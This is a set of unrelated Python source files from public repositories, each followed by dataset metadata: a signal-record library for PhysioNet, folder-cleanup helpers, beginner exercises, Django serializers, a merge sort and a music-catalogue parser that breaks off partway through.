Update the parameters of the objects to reflect\n # the state of the sections read.\n # 3. Update the parameters of the overall MultiRecord\n # object to reflect the state of the individual segments.\n # 4. If specified, convert the MultiRecord object\n # into a single Record object.\n\n # Segments field is a list of Record objects\n # Empty segments store None.\n\n record.segments = [None] * record.n_seg\n\n # Variable layout, read the layout specification header\n if record.layout == 'variable':\n record.segments[0] = rdheader(os.path.join(dir_name,\n record.seg_name[0]),\n pb_dir=pb_dir)\n\n # The segment numbers and samples within each segment to read.\n seg_numbers, seg_ranges = record._required_segments(sampfrom, sampto)\n # The channels within each segment to read\n seg_channels = record._required_channels(seg_numbers, channels,\n dir_name, pb_dir)\n\n # Read the desired samples in the relevant segments\n for i in range(len(seg_numbers)):\n seg_num = seg_numbers[i]\n # Empty segment or segment with no relevant channels\n if record.seg_name[seg_num] == '~' or len(seg_channels[i]) == 0:\n record.segments[seg_num] = None\n else:\n record.segments[seg_num] = rdrecord(\n os.path.join(dir_name, record.seg_name[seg_num]),\n sampfrom=seg_ranges[i][0], sampto=seg_ranges[i][1],\n channels=seg_channels[i], physical=physical, pb_dir=pb_dir)\n\n # Arrange the fields of the layout specification segment, and\n # the overall object, to reflect user input.\n record._arrange_fields(seg_numbers=seg_numbers, seg_ranges=seg_ranges,\n channels=channels, sampfrom=sampfrom,\n force_channels=force_channels)\n\n # Convert object into a single segment Record object\n if m2s:\n record = record.multi_to_single(physical=physical,\n return_res=return_res)\n\n # Perform dtype conversion if necessary\n if isinstance(record, Record) and record.n_sig > 0:\n record.convert_dtype(physical, return_res, smooth_frames)\n\n return record\n\n\ndef rdsamp(record_name, sampfrom=0, sampto=None, channels=None, pb_dir=None,\n channel_names=None, warn_empty=False):\n \"\"\"\n Read a WFDB record, and return the physical signals and a few important\n descriptor fields.\n\n Parameters\n ----------\n record_name : str\n The name of the WFDB record to be read (without any file\n extensions). If the argument contains any path delimiter\n characters, the argument will be interpreted as PATH/baserecord\n and the data files will be searched for in the local path.\n sampfrom : int, optional\n The starting sample number to read for all channels.\n sampto : int, or 'end', optional\n The sample number at which to stop reading for all channels.\n Reads the entire duration by default.\n channels : list, optional\n List of integer indices specifying the channels to be read.\n Reads all channels by default.\n pb_dir : str, optional\n Option used to stream data from Physiobank. The Physiobank\n database directory from which to find the required record files.\n eg. For record '100' in 'http://physionet.org/physiobank/database/mitdb'\n pb_dir='mitdb'.\n channel_names : list, optional\n List of channel names to return. 
If this parameter is specified,\n it takes precedence over `channels`.\n warn_empty : bool, optional\n Whether to display a warning if the specified channel indices\n or names are not contained in the record, and no signal is\n returned.\n\n Returns\n -------\n signals : numpy array\n A 2d numpy array storing the physical signals from the record.\n fields : dict\n A dictionary containing several key attributes of the read\n record:\n - fs: The sampling frequency of the record\n - units: The units for each channel\n - sig_name: The signal name for each channel\n - comments: Any comments written in the header\n\n Notes\n -----\n If a signal range or channel selection is specified when calling\n this function, the resulting attributes of the returned object will\n be set to reflect the section of the record that is actually read,\n rather than necessarily the entire record. For example, if\n `channels=[0, 1, 2]` is specified when reading a 12 channel record,\n the 'n_sig' attribute will be 3, not 12.\n\n The `rdrecord` function is the base function upon which this one is\n built. It returns all attributes present, along with the signals, as\n attributes in a `Record` object. The function, along with the\n returned data type, has more options than `rdsamp` for users who\n wish to more directly manipulate WFDB content.\n\n Examples\n --------\n >>> signals, fields = wfdb.rdsamp('sample-data/test01_00s',\n sampfrom=800,\n channel =[1,3])\n\n \"\"\"\n record = rdrecord(record_name=record_name, sampfrom=sampfrom,\n sampto=sampto, channels=channels, physical=True,\n pb_dir=pb_dir, m2s=True, channel_names=channel_names,\n warn_empty=warn_empty)\n\n signals = record.p_signal\n fields = {}\n for field in ['fs','sig_len', 'n_sig', 'base_date', 'base_time',\n 'units','sig_name', 'comments']:\n fields[field] = getattr(record, field)\n\n return signals, fields\n\n\ndef _get_wanted_channels(wanted_sig_names, record_sig_names, pad=False):\n \"\"\"\n Given some wanted signal names, and the signal names contained in a\n record, return the indices of the record channels that intersect.\n\n Parameters\n ----------\n wanted_sig_names : list\n List of desired signal name strings\n record_sig_names : list\n List of signal names for a single record\n pad : bool, optional\n Whether the output channels is to always have the same number\n of elements and the wanted channels. If True, pads missing\n signals with None.\n\n Returns\n -------\n wanted_channel_inds\n\n \"\"\"\n if pad:\n return [record_sig_names.index(s) if s in record_sig_names else None for s in wanted_sig_names]\n else:\n return [record_sig_names.index(s) for s in wanted_sig_names if s in record_sig_names]\n\n\n#------------------- /Reading Records -------------------#\n\n\ndef wrsamp(record_name, fs, units, sig_name, p_signal=None, d_signal=None,\n fmt=None, adc_gain=None, baseline=None, comments=None,\n base_time=None, base_date=None, write_dir=''):\n \"\"\"\n Write a single segment WFDB record, creating a WFDB header file and any\n associated dat files.\n\n Parameters\n ----------\n record_name : str\n The string name of the WFDB record to be written (without any file\n extensions).\n fs : int, or float\n The sampling frequency of the record.\n units : list\n A list of strings giving the units of each signal channel.\n sig_name :\n A list of strings giving the signal name of each signal channel.\n p_signal : numpy array, optional\n An (MxN) 2d numpy array, where M is the signal length. Gives the\n physical signal values intended to be written. 
Either p_signal or\n d_signal must be set, but not both. If p_signal is set, this method will\n use it to perform analogue-digital conversion, writing the resultant\n digital values to the dat file(s). If fmt is set, gain and baseline must\n be set or unset together. If fmt is unset, gain and baseline must both\n be unset.\n d_signal : numpy array, optional\n An (MxN) 2d numpy array, where M is the signal length. Gives the\n digital signal values intended to be directly written to the dat\n file(s). The dtype must be an integer type. Either p_signal or d_signal\n must be set, but not both. In addition, if d_signal is set, fmt, gain\n and baseline must also all be set.\n fmt : list, optional\n A list of strings giving the WFDB format of each file used to store each\n channel. Accepted formats are: '80','212\",'16','24', and '32'. There are\n other WFDB formats as specified by:\n https://www.physionet.org/physiotools/wag/signal-5.htm\n but this library will not write (though it will read) those file types.\n adc_gain : list, optional\n A list of numbers specifying the ADC gain.\n baseline : list, optional\n A list of integers specifying the digital baseline.\n comments : list, optional\n A list of string comments to be written to the header file.\n base_time : str, optional\n A string of the record's start time in 24h 'HH:MM:SS(.ms)' format.\n base_date : str, optional\n A string of the record's start date in 'DD/MM/YYYY' format.\n write_dir : str, optional\n The directory in which to write the files.\n\n Notes\n -----\n This is a gateway function, written as a simple method to write WFDB record\n files using the most common parameters. Therefore not all WFDB fields can be\n set via this function.\n\n For more control over attributes, create a `Record` object, manually set its\n attributes, and call its `wrsamp` instance method. 
If you choose this more\n advanced method, see also the `set_defaults`, `set_d_features`, and\n `set_p_features` instance methods to help populate attributes.\n\n Examples\n --------\n >>> # Read part of a record from Physiobank\n >>> signals, fields = wfdb.rdsamp('a103l', sampfrom=50000, channels=[0,1],\n pb_dir='challenge/2015/training')\n >>> # Write a local WFDB record (manually inserting fields)\n >>> wfdb.wrsamp('ecgrecord', fs = 250, units=['mV', 'mV'],\n sig_name=['I', 'II'], p_signal=signals, fmt=['16', '16'])\n\n \"\"\"\n\n # Check input field combinations\n if p_signal is not None and d_signal is not None:\n raise Exception('Must only give one of the inputs: p_signal or d_signal')\n if d_signal is not None:\n if fmt is None or adc_gain is None or baseline is None:\n raise Exception(\"When using d_signal, must also specify 'fmt', 'gain', and 'baseline' fields.\")\n # Depending on whether d_signal or p_signal was used, set other\n # required features.\n if p_signal is not None:\n # Create the Record object\n record = Record(record_name=record_name, p_signal=p_signal, fs=fs,\n fmt=fmt, units=units, sig_name=sig_name,\n adc_gain=adc_gain, baseline=baseline,\n comments=comments, base_time=base_time,\n base_date=base_date)\n # Compute optimal fields to store the digital signal, carry out adc,\n # and set the fields.\n record.set_d_features(do_adc=1)\n else:\n # Create the Record object\n record = Record(record_name=record_name, d_signal=d_signal, fs=fs,\n fmt=fmt, units=units, sig_name=sig_name,\n adc_gain=adc_gain, baseline=baseline,\n comments=comments, base_time=base_time,\n base_date=base_date)\n # Use d_signal to set the fields directly\n record.set_d_features()\n\n # Set default values of any missing field dependencies\n record.set_defaults()\n # Write the record files - header and associated dat\n record.wrsamp(write_dir=write_dir)\n\n\ndef is_monotonic(full_list):\n \"\"\"\n Determine whether elements in a list are monotonic. ie. unique\n elements are clustered together.\n\n ie. [5,5,3,4] is, [5,3,5] is not.\n \"\"\"\n prev_elements = set({full_list[0]})\n prev_item = full_list[0]\n\n for item in full_list:\n if item != prev_item:\n if item in prev_elements:\n return False\n prev_item = item\n prev_elements.add(item)\n\n return True\n\ndef dl_database(db_dir, dl_dir, records='all', annotators='all',\n keep_subdirs=True, overwrite=False):\n \"\"\"\n Download WFDB record (and optionally annotation) files from a\n Physiobank database. The database must contain a 'RECORDS' file in\n its base directory which lists its WFDB records.\n\n Parameters\n ----------\n db_dir : str\n The Physiobank database directory to download. eg. For database:\n 'http://physionet.org/physiobank/database/mitdb', db_dir='mitdb'.\n dl_dir : str\n The full local directory path in which to download the files.\n records : list, or 'all', optional\n A list of strings specifying the WFDB records to download. Leave\n as 'all' to download all records listed in the database's\n RECORDS file.\n eg. records=['test01_00s', test02_45s] for database:\n https://physionet.org/physiobank/database/macecgdb/\n annotators : list, 'all', or None, optional\n A list of strings specifying the WFDB annotation file types to\n download along with the record files. Is either None to skip\n downloading any annotations, 'all' to download all annotation\n types as specified by the ANNOTATORS file, or a list of strings\n which each specify an annotation extension.\n eg. 
annotators = ['anI'] for database:\n https://physionet.org/physiobank/database/prcp/\n keep_subdirs : bool, optional\n Whether to keep the relative subdirectories of downloaded files\n as they are organized in Physiobank (True), or to download all\n files into the same base directory (False).\n overwrite : bool, optional\n If True, all files will be redownloaded regardless. If False,\n existing files with the same name and relative subdirectory will\n be checked. If the local file is the same size as the online\n file, the download is skipped. If the local file is larger, it\n will be deleted and the file will be redownloaded. If the local\n file is smaller, the file will be assumed to be partially\n downloaded and the remaining bytes will be downloaded and\n appended.\n\n Examples\n --------\n >>> wfdb.dl_database('ahadb', os.getcwd())\n\n \"\"\"\n # Full url physiobank database\n db_url = posixpath.join(download.config.db_index_url, db_dir)\n # Check if the database is valid\n r = requests.get(db_url)\n r.raise_for_status()\n\n # Get the list of records\n recordlist = download.get_record_list(db_dir, records)\n # Get the annotator extensions\n annotators = download.get_annotators(db_dir, annotators)\n\n # All files to download (relative to the database's home directory)\n allfiles = []\n\n for rec in recordlist:\n # Check out whether each record is in MIT or EDF format\n if rec.endswith('.edf'):\n allfiles.append(rec)\n else:\n # May be pointing to directory\n if rec.endswith('/'):\n rec = rec + rec[:-1]\n # If MIT format, have to figure out all associated files\n allfiles.append(rec+'.hea')\n dir_name, baserecname = os.path.split(rec)\n record = rdheader(baserecname, pb_dir=posixpath.join(db_dir, dir_name))\n\n # Single segment record\n if isinstance(record, Record):\n # Add all dat files of the segment\n for file in (record.file_name if record.file_name else []):\n allfiles.append(posixpath.join(dir_name, file))\n\n # Multi segment record\n else:\n for seg in record.seg_name:\n # Skip empty segments\n if seg == '~':\n continue\n # Add the header\n allfiles.append(posixpath.join(dir_name, seg+'.hea'))\n # Layout specifier has no dat files\n if seg.endswith('_layout'):\n continue\n # Add all dat files of the segment\n recseg = rdheader(seg, pb_dir=posixpath.join(db_dir, dir_name))\n for file in recseg.file_name:\n allfiles.append(posixpath.join(dir_name, file))\n # check whether the record has any requested annotation files\n if annotators is not None:\n for a in annotators:\n annfile = rec+'.'+a\n url = posixpath.join(download.config.db_index_url, db_dir, annfile)\n rh = requests.head(url)\n\n if rh.status_code != 404:\n allfiles.append(annfile)\n\n dlinputs = [(os.path.split(file)[1], os.path.split(file)[0], db_dir, dl_dir, keep_subdirs, overwrite) for file in allfiles]\n\n # Make any required local directories\n download.make_local_dirs(dl_dir, dlinputs, keep_subdirs)\n\n print('Downloading files...')\n # Create multiple processes to download files.\n # Limit to 2 connections to avoid overloading the server\n pool = multiprocessing.Pool(processes=2)\n pool.map(download.dl_pb_file, dlinputs)\n print('Finished downloading files')\n\n return\n\n\n# -------------- WFDB Signal Calibration and Classification ---------- #\n\n\n# Unit scales used for default display scales.\nunit_scale = {\n 'voltage': ['pV', 'nV', 'uV', 'mV', 'V', 'kV'],\n 'temperature': ['C', 'F'],\n 'pressure': ['mmHg'],\n 'no_unit': ['NU'],\n 'percentage': ['%'],\n 'heart_rate': ['bpm'],\n}\n\n\n\"\"\"\nSignal classes 
that wfdb signals should fall under. The indexes are the\nabbreviated class names.\n\nParameters\n----------\ndescription:\n The full descriptive name for the signal class.\nunit_scale:\n The unit scale that the class should measure. 'No Unit' will also\n be allowed in all cases. * Will it always be 1?\nsignal_names:\n The signal names that belong to the class.\n\nNotes\n-----\nThis will be used to automatically classify signals in classes based\non their names.\n\n\"\"\"\n\nSIGNAL_CLASSES = pd.DataFrame(\n index=['bp', 'co2', 'co', 'ecg', 'eeg', 'emg', 'eog', 'hr', 'mmg',\n 'o2', 'pleth', 'resp', 'scg', 'stat', 'st', 'temp', 'unknown'],\n columns=['description', 'unit_scale', 'signal_names'],\n data=[['Blood Pressure', 'pressure', ['bp','abp','pap','cvp']], # bp\n ['Carbon Dioxide', 'percentage', ['co2', 'pco2']], # co2\n ['Carbon Monoxide', 'percentage', ['co']], # co\n ['Electrocardiogram', 'voltage', ['i','ii','iii','iv','v','avr']], # ecg\n ['Electroencephalogram', 'voltage', ['eeg']], # eeg\n ['Electromyograph', 'voltage', ['emg']], # emg\n ['Electrooculograph', 'voltage', ['eog']], # eog\n ['Heart Rate', 'heart_rate', ['hr']], # hr\n ['Magnetomyograph', 'voltage', ['mmg']], # mmg\n ['Oxygen', 'percentage', ['o2', 'spo2']], # o2\n ['Plethysmograph', 'pressure', ['pleth']], # pleth\n ['Respiration', 'no_unit', ['resp']], # resp\n ['Seismocardiogram', 'no_unit', ['scg']], # scg\n ['Status', 'no_unit', ['stat', 'status']], # stat\n ['ST Segment', '', ['st']], # st. This is not a signal?\n ['Temperature', 'temperature', ['temp']], # temp\n ['Unknown Class', 'no_unit', []], # unknown. special class.\n ]\n)\n","repo_name":"MasonYyp/wfdb_ecg","sub_path":"libs/wfdb/io/record.py","file_name":"record.py","file_ext":"py","file_size_in_byte":73524,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"24261602661","text":"import os\nimport glob\nimport shutil\n\ndef removeIpynbCheckpointsFromTrainingDataset():\n if (os.path.isdir('trainingDataset/.ipynb_checkpoints')):\n shutil.rmtree('trainingDataset/.ipynb_checkpoints')\n if (os.path.isdir('trainingDataset/train/.ipynb_checkpoints')):\n shutil.rmtree('trainingDataset/train/.ipynb_checkpoints')\n if (os.path.isdir('trainingDataset/val/.ipynb_checkpoints')):\n shutil.rmtree('trainingDataset/val/.ipynb_checkpoints')\n\ndef refreshTrainingDataset():\n if (os.path.isdir('trainingDataset')):\n shutil.rmtree('trainingDataset')\n os.mkdir('trainingDataset')\n os.mkdir('trainingDataset/train')\n os.mkdir('trainingDataset/train/normal')\n os.mkdir('trainingDataset/train/rollover')\n os.mkdir('trainingDataset/val')\n os.mkdir('trainingDataset/val/normal')\n os.mkdir('trainingDataset/val/rollover')\n \n\ndef cleanDataset(folder_path, file_extension):\n\n # Create a file path pattern to match files with the given extension\n file_pattern = os.path.join(folder_path, f'*.{file_extension}')\n\n # Use glob to find all files matching the pattern\n files_to_remove = glob.glob(file_pattern)\n\n # Remove each file\n for file_path in files_to_remove:\n try:\n os.remove(file_path)\n except OSError as e:\n print(f\"Error while deleting file: {file_path}\\n{e}\")\n\n\n\ndef cleanModel(folder_path):\n \n if not(os.path.isdir('model')):\n os.mkdir('model')\n \n # List all files and directories in the given folder\n items = os.listdir(folder_path)\n \n # Iterate through each item\n for item in items:\n item_path = os.path.join(folder_path, item)\n\n if os.path.isfile(item_path):\n # If the item is a file, remove 
it\n try:\n os.remove(item_path)\n except OSError as e:\n print(f\"Error while deleting file: {item_path}\\n{e}\")\n elif os.path.isdir(item_path):\n # If the item is a directory, recursively call the function\n cleanModel(item_path)\n","repo_name":"oliviermirat/ZZDeepRollover","sub_path":"zzdeeprollover/cleanFolders.py","file_name":"cleanFolders.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"28557191030","text":"# Ask the user to enter a number. \n# Print all the odd numbers between 0 and that number (inclusive).\n\n\nnumber = int(input(\"Enter a number: \"))\nfor i in range(1, number + 1, 2):\n print(i)\n","repo_name":"SheCodesAus/she-codes-python-exercises-mvmirhan","sub_path":"0_exercises/whileloops_q2.py","file_name":"whileloops_q2.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"16171728857","text":"from sys import stdin\nfrom collections import deque\ndef dfs(x):\n global topo,visitados\n visitados[x] = True\n for u in graph[x]:\n if visitados[u] == False:\n dfs(u)\n topo.appendleft(x)\n \ndef main():\n global visitados , graph, topo\n nodos,aristas = [int(x) for x in stdin.readline().strip().split()]\n while nodos+aristas:\n graph = {}\n visitados = {}\n topo = deque()\n for x in range(1,nodos+1):\n graph[x] = []\n visitados[x] = False\n for x in range(aristas):\n a,b = [int(x) for x in stdin.readline().strip().split()]\n graph[a].append(b)\n for x in range(1,nodos+1):\n if visitados[x] == False:\n dfs(x)\n print(*topo)\n nodos,aristas = [int(x) for x in stdin.readline().strip().split()]\nmain()\n","repo_name":"CAndresRa/UvaSolution","sub_path":"10305 - Ordering Tasks.py","file_name":"10305 - Ordering Tasks.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"31791020261","text":"\"\"\"\nauthor : Lee Sang Min\ngithub : https://github.com/sangm1n\ne-mail : dltkd96als@naver.com\n\ntitle : tree traversal\ndescription : Tree\n\"\"\"\n\n\ndef preorder(root):\n if root != '.':\n print(root, end='')\n preorder(tree[root][0])\n preorder(tree[root][1])\n\n\ndef inorder(root):\n if root != '.':\n inorder(tree[root][0])\n print(root, end='')\n inorder(tree[root][1])\n\n\ndef postorder(root):\n if root != '.':\n postorder(tree[root][0])\n postorder(tree[root][1])\n print(root, end='')\n\n\nN = int(input())\ntree = dict()\nfor i in range(N):\n parent, left, right = map(str, input().split())\n tree[parent] = [left, right]\n\npreorder('A')\nprint()\ninorder('A')\nprint()\npostorder('A')\n","repo_name":"sangm1n/problem-solving","sub_path":"BOJ/1991.py","file_name":"1991.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"30548633094","text":"from colored import fg, attr\n\nunderline = attr(4)\nbold = attr(1)\ntext = fg(99)\nreset = attr(0)\n\n# List of locations\nlocations = [\"street\", \"beach\", \"house\"]\n\n\ndef locationchoice(message):\n \"\"\"Test for checking if an input is a valid location \"\"\"\n print(underline + text + bold + \"\\nPICK A LOCATION\" + reset)\n for l in locations:\n print(f\"* {l}\")\n # The while loop makes sure the program continues until the user\n # has inputted a valid location\n while True:\n # The try statement attempts to execute the user input\n try:\n userInput = str(input(message))\n # The if-else statement tests to see if the location is valid\n # If the location is valid then the program continues\n if userInput == \"street\":\n print(\"That's going to be a challenging place.\")\n import tools\n print(tools.toolschoice(\"\"))\n return userInput\n\n elif userInput == \"beach\":\n print(\"What beautiful scenery.\")\n import tools\n print(tools.toolschoice(\"\"))\n return userInput\n\n elif userInput == \"house\":\n print(\"Yikes. Clean house more.\")\n import tools\n print(tools.toolschoice(\"\"))\n return userInput\n # If the location is invalid then the user must\n # try again\n\n else:\n print(\"Invalid choice. Please try again.\")\n continue\n # If the user inputs a wrong location\n except NameError:\n print(\"Input is not available. Try again.\")\n continue\n\n# Using the function locationchoice to ask for the user inputs\nuserInput = locationchoice(\"\\nLOCATION: \")\nprint(userInput)\nprint(\"\\n\")\n","repo_name":"rbqi/CapstoneProject","sub_path":"locations.py","file_name":"locations.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"11384847041","text":"from rest_framework import serializers\n\nfrom .models import *\n\nclass households_serializer(serializers.ModelSerializer):\n class Meta:\n model=households\n fields=('id','latitude','longitude','monthly_income','person_count','house_image','image_link')\n\n def create(self, validated_data):\n\n return households.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.latitude = validated_data.get('latitude', instance.latitude)\n instance.longitude = validated_data.get('longitude', instance.longitude)\n instance.monthly_income = validated_data.get('monthly_income', instance.monthly_income)\n instance.person_count = validated_data.get('person_count', instance.person_count)\n instance.house_image = validated_data.get('house_image', instance.house_image)\n instance.image_link = validated_data.get('image_link', instance.image_link)\n instance.save()\n return instance\n\nclass person_serializer(serializers.ModelSerializer):\n class Meta:\n model=person\n fields=('id','house_id','person_name','gender','date_of_birth')\n\n def create(self, validated_data):\n\n return person.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.house_id = validated_data.get('house_id', instance.house_id)\n instance.person_name = validated_data.get('person_name', instance.person_name)\n instance.gender = validated_data.get('gender', instance.gender)\n instance.date_of_birth=validated_data.get('date_of_birth',instance.date_of_birth)\n instance.save()\n return instance\n\nclass farm_serializer(serializers.ModelSerializer):\n class Meta:\n model=farm\n fields=('id','house_id','farm_area','farm_points','farm_link')\n\n def create(self, validated_data):\n\n return farm.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.house_id = validated_data.get('house_id', instance.house_id)\n instance.farm_area = validated_data.get('farm_area', instance.farm_area)\n instance.farm_points = validated_data.get('farm_points', instance.farm_points)\n instance.farm_link = validated_data.get('farm_link', instance.farm_link)\n instance.save()\n return instance\n\nclass farm_shape_serializer(serializers.ModelSerializer):\n class Meta:\n model=farm_shape\n 
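# A minimal usage sketch for these serializers (hypothetical field values,
# assuming the usual DRF request/response flow; not part of the original file):
#     ser = farm_shape_serializer(
#         data={'farm_id': 1, 'lat': 12.97, 'lon': 77.59, 'sequence_number': 0})
#     if ser.is_valid():
#         ser.save()  # with no instance given, save() routes to create() below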
fields=('farm_id','lat','lon','sequence_number')\n\n def create(self, validated_data):\n\n return farm_shape.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.lat = validated_data.get('lat', instance.lat)\n instance.lon = validated_data.get('lon', instance.lon)\n instance.sequence_number = validated_data.get('sequence_number', instance.sequence_number)\n instance.save()\n return instance\n\nclass crops_serializer(serializers.ModelSerializer):\n class Meta:\n model=crops\n fields=('id','crop_name')\n\n def create(self, validated_data):\n\n return crops.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.crop_name = validated_data.get('crop_name', instance.crop_name)\n instance.save()\n return instance\n\nclass season_wise_crop_serializer(serializers.ModelSerializer):\n class Meta:\n model=season_wise_crop\n fields=('id','season_name','crop_name','farm_id','area_cultivated')\n\n def create(self, validated_data):\n\n return season_wise_crop.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.season_name = validated_data.get('season_name', instance.season_name)\n instance.crop_name = validated_data.get('crop_name', instance.crop_name)\n instance.farm_id = validated_data.get('farm_id', instance.farm_id)\n instance.area_cultivated=validated_data.get('area_cultivated',instance.area_cultivated)\n instance.save()\n return instance\n\nclass wells_serializer(serializers.ModelSerializer):\n class Meta:\n model=wells\n fields=('id','latitude','longitude','depth','avg_water_yield')\n\n def create(self, validated_data):\n\n return wells.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.latitude = validated_data.get('latitude', instance.latitude)\n instance.longitude = validated_data.get('longitude', instance.longitude)\n instance.depth = validated_data.get('depth', instance.depth)\n instance.avg_water_yield = validated_data.get('avg_water_yield', instance.avg_water_yield)\n instance.save()\n return instance\n\nclass well_observations_serializer(serializers.ModelSerializer):\n class Meta:\n model=well_observations\n fields=('id','date_time','well_id','water_yield')\n\n def create(self, validated_data):\n\n return well_observations.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.date_time = validated_data.get('date_time', instance.date_time)\n instance.well_id = validated_data.get('well_id', instance.well_id)\n instance.water_yield = validated_data.get('water_yield', instance.water_yield)\n instance.save()\n return instance","repo_name":"Saivishal27/Group11_ITS_Server","sub_path":"Farms/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14090287563","text":"from pyDSAlgo.Algo import PyAlgo\n\n\nclass PyMergeSort(PyAlgo):\n def __init__(self, arr):\n super().__init__()\n self.arr = arr\n\n @staticmethod\n def merge(left, right):\n result = []\n i = j = 0\n\n while i < len(left) and j < len(right):\n if left[i] < right[j]:\n result.append(left[i])\n i += 1\n else:\n result.append(right[j])\n j += 1\n\n result.extend(left[i:])\n result.extend(right[j:])\n\n return result\n\n def sort(self):\n if len(self.arr) <= 1:\n return self.arr\n\n mid = len(self.arr) // 2\n left_half = self.arr[:mid]\n right_half = self.arr[mid:]\n\n left_sorted = 
PyMergeSort(left_half).sort()\n right_sorted = PyMergeSort(right_half).sort()\n\n return self.merge(left_sorted, right_sorted)\n","repo_name":"sattyamjjain/pyDSAlgo","sub_path":"pyDSAlgo/Algo/Sorting/PyMergeSort.py","file_name":"PyMergeSort.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73888872372","text":"import re\n\nclass Print:\n def __init__(self, edition, print_id, partiture):\n self.edition = edition\n self.print_id = print_id\n self.partiture = partiture\n \n # maybe DONE\n def format(self):\n print(\"Print Number: \"+str(self.print_id))\n \n if self.edition.composition.authors:\n persons = \"\"\n for person in self.edition.composition.authors:\n if person.born is not None:\n if person.died is not None:\n persons += \"{} ({}--{}); \".format(person.name,person.born,person.died)\n else:\n persons += \"{} ({}--); \".format(person.name,person.born)\n else:\n if person.died is not None:\n persons += \"{} (--{}); \".format(person.name,person.died)\n else:\n persons += \"{}; \".format(person.name)\n \n print(\"Composer: \" + persons[:-2])\n if self.edition.composition.name is not None:\n print(\"Title: \" + self.edition.composition.name)\n if self.edition.composition.genre is not None:\n print(\"Genre: \" + self.edition.composition.genre)\n if self.edition.composition.key is not None:\n print(\"Key: \" + self.edition.composition.key)\n if self.edition.composition.year is not None:\n print(\"Composition Year: \" + str(self.edition.composition.year))\n if self.edition.name is not None:\n print(\"Edition: \" + self.edition.name)\n if self.edition.authors:\n authors = \"\"\n for author in self.edition.authors:\n authors += \"{}, \".format(author.name)\n print(\"Editor: \" + authors[:-2])\n if self.edition.composition.voices:\n for i in range(len(self.edition.composition.voices)):\n voice = self.edition.composition.voices[i]\n if voice is None:\n continue\n if voice.range is not None and voice.name is not None:\n print(\"Voice {}: {}, {}\".format(i+1,voice.range,voice.name))\n elif voice.name is not None:\n print(\"Voice {}: {}\".format(i+1,voice.name))\n else:\n print(\"Voice {}: {}\".format(i+1,voice.range))\n if self.partiture:\n print(\"Partiture: yes\")\n else:\n print(\"Partiture: no\")\n if self.edition.composition.incipit is not None:\n print(\"Incipit: \" + self.edition.composition.incipit)\n\n def composition(self):\n return self.edition.composition\n\n\nclass Edition:\n def __init__(self,composition,authors,name):\n self.composition = composition\n self.authors = authors\n self.name = name\n\nclass Composition:\n def __init__(self, name, incipit, key, genre, year, voices, authors):\n self.name = name\n self.incipit = incipit\n self.key = key\n self.genre = genre\n self.year = year\n self.voices = voices\n self.authors = authors\n\nclass Voice:\n def __init__(self, name, range):\n self.name = name\n self.range = range\n\nclass Person:\n def __init__(self, name, born, died):\n self.name = name\n self.born = born\n self.died = died\n\n def __str__(self):\n return self.name\n\nclass Template:\n def __init__(self):\n self.print_num = None\n self.composers = []\n self.title = None\n self.genre = None\n self.key = None\n self.comp_year = None\n self.edition = None\n self.editors = []\n self.voices = []\n self.partiture = False\n self.incipit = None\n \n # helper method for debugging\n def __str__(self):\n return \"PN: {}\\nCOMP: {}\\nTitle: {}\\nGenre: {}\\nKey: {}\\nCompYear: 
{}\\nEdition: {}\\nEditors: {}\\nVoices: {}\\nPartiture: {}\\nIncipit: {}\\n\".format(self.print_num,\n self.composers,\n self.title,\n self.genre,\n self.key,\n self.comp_year,\n self.edition,\n self.editors,\n self.voices,\n self.partiture,\n self.incipit\n )\n \n# DONE\ndef load(filename):\n prints = []\n tmpValues = Template()\n for line in open(filename,\"r\"):\n if line == '\\n': # save current print, and create blank one from template\n if tmpValues.print_num is not None: # when there are more new lines between prints, ignore second one\n prints.append(Print(Edition(Composition(tmpValues.title\n ,tmpValues.incipit,tmpValues.key,tmpValues.genre\n ,tmpValues.comp_year,tmpValues.voices\n ,tmpValues.composers),tmpValues.editors\n ,tmpValues.edition),tmpValues.print_num\n ,tmpValues.partiture))\n tmpValues = Template()\n # DONE\n if line.startswith(\"Print Number\"):\n number = line.split(':')[1].strip()\n tmpValues.print_num = None if number == \"\" else int(number)\n # DONE\n if line.startswith(\"Composer\"):\n r = re.compile(r\"Composer: (.*)\")\n m = r.match(line)\n if m is None or m.group(1) == \"\": # when there is no name\n continue\n rawcomp = m.group(1)\n comp = rawcomp.split(\";\")\n for c in comp:\n if not c:\n continue\n s = re.compile(r\"(.*) \\((.*)\\)\") # separete name and years\n n = s.match(c)\n if n is None: # doesnt have (years)\n composer = Person(c.strip(),None,None)\n tmpValues.composers.append(composer)\n else:\n name = n.group(1).strip()\n n.group(2).strip()\n t = re.compile(r\"\\d{4}\") # pattern for four digits = year\n born = None\n died = None\n if \"-\" in n.group(2):\n # if there is \"-\", split by \"-\" or \"--\"\n if \"--\" in n.group(2):\n years = n.group(2).split(\"--\")\n else:\n years = n.group(2).split(\"-\")\n o = t.match(years[0]) if len(years[0]) == 4 else None\n if o is not None:\n born = int(o.group(0))\n o = t.match(years[1]) if len(years[1]) == 4 else None\n if o is not None:\n died = int(o.group(0))\n 